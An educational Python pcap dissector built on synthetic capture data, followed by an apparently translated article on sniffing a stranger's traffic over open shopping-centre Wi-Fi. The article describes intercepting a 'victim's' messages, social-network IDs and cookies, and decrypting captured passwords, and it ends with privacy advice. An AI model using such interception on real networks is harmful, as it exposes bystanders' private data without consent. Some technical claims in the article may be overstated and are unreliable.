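As an added example (not code from this page or from the Wireshark project), the following Python script does in miniature what the section above describes: it reads a classic pcap file image, splits each frame into its Ethernet, IPv4 and TCP/UDP layers the way a sniffer's protocol tree does, and then, in the spirit of the administrator's use of a sniffer, reports which flows run over ports whose protocols are normally unencrypted. The capture is constructed inline (documentation addresses 192.0.2.x and 198.51.100.x, synthetic HTTP, TLS and DNS payloads, zeroed checksums), so nothing is captured from a real network; `CLEARTEXT_PORTS`, `parse_pcap` and `find_cleartext` are names chosen for this example.

```python
"""Minimal pcap dissector (added example, not Wireshark's own code): splits each
frame into Ethernet / IPv4 / TCP-or-UDP fields like a sniffer's protocol tree
and flags flows on ports whose protocols are normally unencrypted. All capture
data is constructed inline; nothing is sniffed from a real network."""
import struct

PCAP_MAGIC = 0xA1B2C3D4          # classic pcap, microsecond timestamps
LINKTYPE_ETHERNET, ETHERTYPE_IPV4 = 1, 0x0800
PROTO_TCP, PROTO_UDP = 6, 17
# Illustrative subset of well-known ports whose protocols carry data in the clear.
CLEARTEXT_PORTS = {21: "ftp", 23: "telnet", 53: "dns", 80: "http", 110: "pop3", 143: "imap"}


def build_frame(src_ip, dst_ip, proto, sport, dport, payload):
    """Assemble a synthetic Ethernet/IPv4/{TCP,UDP} frame (checksums left 0)."""
    if proto == PROTO_TCP:   # seq=1 ack=1, data offset 5 words, flags PSH|ACK
        l4 = struct.pack("!HHIIHHHH", sport, dport, 1, 1, 0x5018, 65535, 0, 0)
    else:
        l4 = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4) + len(payload), 1,
                     0x4000, 64, proto, 0,
                     bytes(int(o) for o in src_ip.split(".")),
                     bytes(int(o) for o in dst_ip.split(".")))
    eth = bytes.fromhex("001122334455" "66778899aabb") + struct.pack("!H", ETHERTYPE_IPV4)
    return eth + ip + l4 + payload


def build_pcap(frames):
    """Wrap frames in a little-endian pcap file image (global + record headers)."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1_700_000_000 + i, 0, len(frame), len(frame)) + frame
    return out


def parse_pcap(data):
    """Dissect every record of a classic pcap into its protocol layers."""
    if struct.unpack("<I", data[:4])[0] == PCAP_MAGIC:
        end = "<"
    elif struct.unpack(">I", data[:4])[0] == PCAP_MAGIC:
        end = ">"
    else:
        raise ValueError("not a classic pcap file (bad magic)")
    if struct.unpack(end + "IHHiIII", data[:24])[6] != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures are supported")
    records, pos = [], 24
    while pos + 16 <= len(data):
        ts_sec, ts_usec, incl, _ = struct.unpack(end + "IIII", data[pos:pos + 16])
        frame = data[pos + 16:pos + 16 + incl]
        pos += 16 + incl
        rec = {"ts": ts_sec + ts_usec / 1e6, "proto": "other"}
        # Layers 2/3: only IPv4 over Ethernet II is dissected further here.
        if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
            records.append(rec)
            continue
        ihl = (frame[14] & 0x0F) * 4
        _, _, total, _, _, ttl, proto, _, s, d = struct.unpack("!BBHHHBBH4s4s", frame[14:34])
        rec.update(src=".".join(map(str, s)), dst=".".join(map(str, d)), ttl=ttl)
        l4 = frame[14 + ihl:14 + total]
        # Layer 4: header length comes from the TCP data offset, or is fixed at 8 for UDP.
        if proto == PROTO_TCP and len(l4) >= 20:
            sport, dport, _, _, off_flags = struct.unpack("!HHIIH", l4[:14])
            rec.update(proto="tcp", sport=sport, dport=dport, payload=l4[(off_flags >> 12) * 4:])
        elif proto == PROTO_UDP and len(l4) >= 8:
            sport, dport = struct.unpack("!HH", l4[:4])
            rec.update(proto="udp", sport=sport, dport=dport, payload=l4[8:])
        records.append(rec)
    return records


def find_cleartext(records):
    """Report flows on ports whose protocols normally run unencrypted."""
    hits = []
    for r in records:
        for port in (r.get("dport"), r.get("sport")):
            if port in CLEARTEXT_PORTS:
                hits.append({"src": r["src"], "dst": r["dst"], "port": port,
                             "service": CLEARTEXT_PORTS[port], "preview": r["payload"][:24]})
                break
    return hits


# Constructed capture: an HTTP request, a TLS ClientHello prefix and a DNS query.
SAMPLE_PCAP = build_pcap([
    build_frame("192.0.2.10", "198.51.100.20", PROTO_TCP, 51000, 80,
                b"GET /login HTTP/1.1\r\nHost: shop.example\r\n\r\n"),
    build_frame("192.0.2.10", "198.51.100.21", PROTO_TCP, 51001, 443,
                bytes.fromhex("160301002a010000260303")),
    build_frame("192.0.2.10", "192.0.2.1", PROTO_UDP, 53001, 53,
                bytes.fromhex("1a2b01000001000000000000") + b"\x04shop\x07example\x00\x00\x01\x00\x01"),
])

if __name__ == "__main__":
    recs = parse_pcap(SAMPLE_PCAP)
    for r in recs:
        print(f'{r["src"]}:{r["sport"]} -> {r["dst"]}:{r["dport"]} [{r["proto"]}] ttl={r["ttl"]}')
    for h in find_cleartext(recs):
        print("cleartext", h["service"], h["src"], "->", h["dst"], h["preview"])
```

Run it directly to print the dissected records and the flagged cleartext flows. `parse_pcap` also accepts a real capture saved from Wireshark's File menu, provided it is saved in the classic pcap format (not the default pcapng) with an Ethernet link type; the HTTP request is reported because its payload is readable, while the TLS flow on port 443 is not flagged, which is exactly the distinction an administrator auditing a segment cares about.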


Internet users are so careless that losing confidential data is as easy as pie. The publication 42.tut conducted an experiment to show how many "holes" there are in public Wi-Fi networks. The conclusion is disappointing: anyone, without special skills or knowledge, can compile a complete dossier on a person using only an open wireless network.

We installed several applications for the experiment. They differ in functionality, but their essence is the same: to collect everything that passes through the network to which the device is connected. None of the programs positions itself as "pirated", "hacker" or illegal; they can be downloaded online without any problems. The experiment was conducted in a shopping centre with free Wi-Fi.

Interception

We connect to the Wi-Fi: there is no password, and the network name contains the word "free". We start scanning, and one of the programs immediately finds 15 connections to the network. For each one you can see the IP address and MAC address, and for some the name of the device manufacturer: Sony, Samsung, Apple, LG, HTC...

We find the "victim" laptop among the devices. We connect to it, and data passing through the network begins to appear on the screen. All information is organised by time; there is even a built-in viewer for the intercepted data.

User identification

We continue watching. An online game has clearly started on the partner's laptop: program commands are constantly being sent to the network, and information about the situation on the battlefield is being received. You can see the opponents' nicknames, their game levels and much more.

A message arrives from "VKontakte". Looking at the detailed specification of one of the messages, we find that the user ID is visible in each of them. If you paste it into the browser, the account of the person who received the message opens.

Meanwhile, the "victim" is writing a reply to the message, and clearly has no idea that we are looking at the photos on his account. One of the social network applications gives a signal, and we can listen to this sound in the player.

Passwords and messages

Photos and sounds are not all that can be "transferred" over open Wi-Fi. For example, one of the programs has a separate tab for tracking correspondence on social networks and instant messengers. Messages are decrypted and sorted by time of sending.

Showing someone else's correspondence is beyond good and evil. But it works. As an illustration, here is part of a dialogue of the author of this text, caught by the tracking computer from the "victim" device.

Another program separately “stores” all cookies and user information, including passwords. Fortunately, in encrypted form, but it immediately offers to install a utility that will decrypt them.

Conclusions

Almost any information can be lost over Wi-Fi. Many public networks provide no protection at all, sometimes not even a password. This means that anyone can intercept the traffic of colleagues, friends or strangers.

There is only one reliable way out of this situation: do not transmit any important information over public networks. For example, do not send phone numbers and passwords in messages, and do not pay with a payment card outside the home. The risk of losing personal data is extremely high.